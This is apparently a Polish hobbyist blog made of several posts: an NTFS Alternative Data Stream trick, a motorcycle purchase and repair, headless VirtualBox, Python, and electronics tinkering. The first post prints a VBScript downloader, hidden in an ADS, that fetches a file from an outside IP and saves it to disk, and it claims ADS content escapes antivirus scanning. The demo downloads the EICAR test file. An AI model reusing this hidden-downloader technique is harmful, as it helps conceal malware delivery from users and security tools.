Złośliwość & ADS [Alternative Data Stream]

Wykorzystanie funkcjonalności ADS systemu plików NTFS w celu uruchomienia złośliwej aplikacji 

Oficjalne zastosowanie ADS-ów

Jako jedno z zastosowań ADS (AlternativeData Stream) przedstawia pliki "Zone Identifier" będące rozszerzeniem dla pliku podstawowego, a zawierające metadane - na przykład informacje o pochodzeniu.

Przeglądarka internetowa jest w stanie oznaczyć plik odpowiednią wartością Zone-Identifier dzięki temu przy próbie otwarcia go z poziomu Windowsa otrzymamy taki komunikat bezpieczeństwa:

Informacja, że dany plik może być niebezpieczny ponieważ pochodzi z internetu.

Kolejnym założeniem ADS miała być kompatybilność między systemami MacOS, a Windows ponieważ swego czasu Windows nie zapisywał metadanych o utworach muzycznych i kopiowanie utworów z jednego systemu na drugi kończyło się brakiem możliwości sprawdzenia autora, tytułu utworu, zespołu...lub nawet brakiem możliwości skopiowania danych ze względu na brak pełnej kompatybilności NTFS (Windows), a HFS (Apple).

Po więcej informacji o możliwościach rozszerzonych strumieni danych odsyłam do dokumentacji oraz kilku innych źródeł [1][2][3].

Mniej oficjalne zastosowanie ADS :)

Jesteśmy w katalogu Workdir, który jest pusty:

Utworzymy sobie "czysty" pliczek *.vbs oraz eicar.txt (służy do testowania antywirusów - powinien zawsze być wykrywany):

No i jest wykrywany. :) 

A .vbs tworzy nam niewinne okienko.

Teraz zrobimy sobie ADS'iątko. Jest to tak proste jak dodanie dwukropka do nazwy już istniejącego pliku. Tym razem namieszamy!

I wpisujemy tam takie cosik:


dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP")
dim bStrm: Set bStrm = createobject("Adodb.Stream")
xHttp.Open "GET", "http://xxx.xxx.xx.164/eicar/eicar.txt", False
xHttp.Send

with bStrm
.type = 1 '//binary
.open
.write xHttp.responseBody
.savetofile "w:\WorkDir\eicar.txt", 2 '//overwrite
end with


Uruchamiamy i...

...downloader pobiera złośliwy plik. :)

Ciekawostka - ADS nie są skanowane przez anwywirusy/antymalware.




Myślę, że na dziś to by było wszystko. Zachęcam do własnoręcznego zgłębienia tematów i możliwości bo gdy dwa lata temu odkryłem ADS i jego właściwości to wszystko działało. Piszę ten artykuł dziś z nowymi screenshootami i skryptami...i jest tak samo.





ツ 

Suzuki GS500 2004 - Moja pierwsza szosa

Rok po prawie roku przerwy od motocykli, w ogóle, ze względu na sprzedanie swojej Yamahy YZF250 i rozpoczęcie studiów postanowiłem sprawić sobie jakiś motocykl z homologacją - dopuszczony do ruchu drogowego.

Szukałem jakichś WR'ek, DR'ek i EXC'ów... Jedną WRkę miałem już upatrzoną....ale z ciekawości zerknąłem na oferty GS'ów ze względu na stare zamiary kupna jednego.

I trafiłem! Blisko, tanio i wyglądała na zdrową. Dzwonię do gościa z nadzieją, że jeszcze aktualne i pytaniem czy mogę rano podjechać. BINGO! Umówieni na 8 rano.

Ja po przejażdżce i nie stwierdzeniu hałasów i prawidłowym funkcjonowaniu sprzętu zdecydowałem się na kupno. Na dodatek jeszcze aktualny właściciel miał pełną teczkę papierów - faktur, pism z urzędu, ubezpieczeń - dotyczących motocykla więc wszystko ładnie pięknie udokumentowane. Pierwszy właściciel, kupiona w Rider w Krakowie. Biorę i nie ma zmiłuj.

Kasa na stół, przeliczamy 3 razy, później umowy sztuk 2 i do domu. Ja na moto jeszcze w ciuchach motocrossowych.

Po powrocie jeszcze szybki wypad do Liberty Motors na Łopuszańskiej po upatrzone ciuchy i szybka przejażdżka na pierwszym sprzęcie:

Tej przynajmniej nie przewróciłem za pierwszym razem :D

A prezentuje się Suzinka o tak:

Przy pierwszej lepszej okazji została oddana na serwis do ASO żeby kontynuować piękną historię (dalej prowadzę jej teczkę oraz zeszyt).
I okazało się, że półpanewki są pęknięte.... Mechanik poprzedniego właściciela za mocno dokręcił pokrywę głowicy i takie tego skutki.

Z racji ukrytej wady szybki kontakt z tematem rękojmy...dogadaliśmy się, że pokrywamy koszt remontu 50/50. Jeśli Pan to czyta to dziękuję bardzo! Nie liczyłem na powodzenie rozmowy. I powodzenia na Monsterze. ;)

Później zabrałem się za najbardziej rzucającą się w oczy "usterkę" wizualną - kolektory:

Szybki ręczny szlif mokrym papierem (100>200>400>600>800>1200):

Później farba i kończymy tak:

Zupełnie nowa jakość. Teraz czeka mnie poprawka ze względu na użycie słabej farby ale z wyników byłem i nadal jestem zadowolony!




Po kilku modyfikacjach (wszystkie wizualne, mechanicznie Suzi jest w stanie idealnym i nie zamieniam nic zmieniać):

Więcej zdjęć w tym sezonie.

Kiedyś przy okazji mycia znalazłem pewną usterkę - pęknięta część ramy do mocowania kufra/uchwytu pasażera:

Ale to prosty fix - wyczyścić, zdrapać, skleić i dodać płaskownik. Zdjęcia po pracach naprawczych nie mam.

I tak oto z moim Plecaczkiem i Suzią robimy już razem chyba 5'ty tysiąc kilometrów. Dostałem ją z przebiegiem 37kkm a teraz na liczniku ma 42kkm.

Fotka z ostatniej szybkiej przejażdżki:

Więcej z czasem. W tym sezonie zostanie wyeksploatowana maksymalnie ^_^

Na stronie jej poświęcone wszystkie technikalia i informacje -> KLIK


Szerokości i przyczepności!

~Ravi

Wirtualka w trybie headless (bez GUI)

Czasem mnie denerwowało, że mam to jedno okienko więcej jak odpalam wirtualkę bo do niczego mi nie było potrzebne po odpaleniu albo nie da się zmienić rozmiaru więc i tak wchodziłem po ssh i tak.
Przy okazji oglądania filmiku Gynvaela zobaczyłem, że jest takie coś jak headless mode czyli odpalony Vbox z Wirtualką ale bez tego całego GUI. Można normalnie odpalić ze swojej konsoli i zapomnieć + żadne dodatkowe okienko nigdzie się nie wala.

Jest to banalnie proste.
Ja nie potrzebowałem żadnego dodatku. 

Mój system: Debian GNU/Linux 8
Wersja Vboxa od Oracle: 4.3_36

Odpalenie ubuntu server w 3 krótkich krokach:

1) Możemy z konsoli sprawdzić jakie mamy wirtualki (jeżeli nazwa jest skomplikowana zawsze można użyć UID)

$ VBoxManage list vms

2) Modyfikujemy wirtualkę:

$ VBoxManage modifyvm "Ubuntu 32 Desktop - Prob for ASM" --vrde on

$ VBoxManage modifyvm "NAZWA WASZEJ WIRTUALKI" --vrde on

3) Odpalamy z wiersza poleceń: 

VBoxHeadless -s "Ubuntu 32 Desktop - Prob for ASM"

 VBoxHeadless -s "NAZWA WASZEJ WIRTUALKI"

 

I koniec. Teraz możemy korzystać z jej wszystkich usług bez dodatkowego okienka. Można sobie to uruchomić w tle albo w screenie.

Mam nadzieję, że wam się to do czegoś przyda! :)

~Ravi

Python

Python....python....python...

.

.

.

.

.

.

PYTHON!

Bardzo fajny język :)

Obiektowy ale dla mnie to kwestia nazewnictwa. Ważne, że dużo potrafi. Ingerować w system oraz można pisać w nim gry. Jest strasznie uniwersalny. Od pisania botów do serwerów webaplikacji albo analizy danych tekstowych i nie.

Łatwo się go uczy. Jeżeli potrzebujesz coś zrobić to znajdujesz do tego bibliotekę i korzystasz z gotowych funkcji. Jeśli nie ma lub nie chcesz korzystać z gotowców można wszystko napisać od podstaw. Prosta składnia - kod określa ilość wcięć:



def HW():
...print("Hello world!")
...if (5<0):
... ...return 0
...elif(5>0):
... ...return 1

Na windowsa polecam PyCharm'a od JetBrains'ów.
Dla studentów darmowy, wystarczy założyć konto na maila uczelnianego. Dla innych wersja community 😉 lub płatność.

Polecam spróbowanie.



~Ravi

Odkrywamy nowe elementy

Zamiast nagrywać i robić odcinki albo posty na temat PRi to ja się bawię. Znalazłem zestaw starych elementów elektronicznych po naprawach telewizorów kineskopowych i innych.
Są tranzystory, trójniki, układy logiczne...
Wszystko.

Na szczęście mamy Google i po wpisaniu  numeru elementu dostajemy jego kartę z opisem.

Wczoraj na tapetę wziąłem sześciokrotny inwerter, czyli 6x bramka NOT. na zdjęciu:

~Ravi

UPDATE: Raspberry

Przedsięwziąłem środki wraz z pomocą mojej dziewczyny żeby mieć na czym zbudować robota... LEGO!

I w przyszłym tygodniu może coś wyląduje na YT.
Zastanawiam się czy zacząć z podłączaniem Malinki... Chyba to zrobię.
Podzielę się tym jak to zrobić na Linuxie i na Win (tutaj potrzebny dodatkowy soft - zapodam).
Pokażę jak ja to robiłem.

I tyle.

Trzymajcie się! :)


~Ravi

Wieczorne zabawy + przerost formy nad treścią

Taki tam niezobowiązujący update

W ramach przygotowania do odcinków dzisiaj pobawiłem się trochę kondensatorami i diodami...
Z tymi panami na dole dioda potrzebowała prawie dwóch sekund zanim zaczynała świecić :)

A później trochę serwo zabaw.

Przerost formy nad treścią

Wieczorne zabawy

Dobrej nocy! :)


~Ravi